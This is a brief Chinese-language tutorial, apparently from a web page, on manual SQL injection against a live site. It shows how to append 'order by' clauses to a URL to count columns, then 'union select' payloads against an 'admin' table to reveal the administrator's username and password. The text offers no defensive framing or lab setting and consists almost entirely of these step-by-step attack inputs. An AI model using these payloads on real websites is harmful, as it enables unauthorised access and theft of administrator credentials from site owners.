首先,在网站后面➕ order by11(数字可以随意),以此来判断字段数目(比如刚开始注入11,载入成功,在注入12,失败,那就是11)

同样添加语句【order by 12】页面报错,所以此站字段长度为11
然后,在链接后面添加语句【union select 1,2,3,4,5,6,7,8,9,10,11 from admin(表名)】,进行联合查询,来暴露可查询的字段编号。
在连接后面添加语句【union select 1,admin,password,4,5,6,7,8,9,10,11 from admin】,即可暴出管理员用户名和密码
网友评论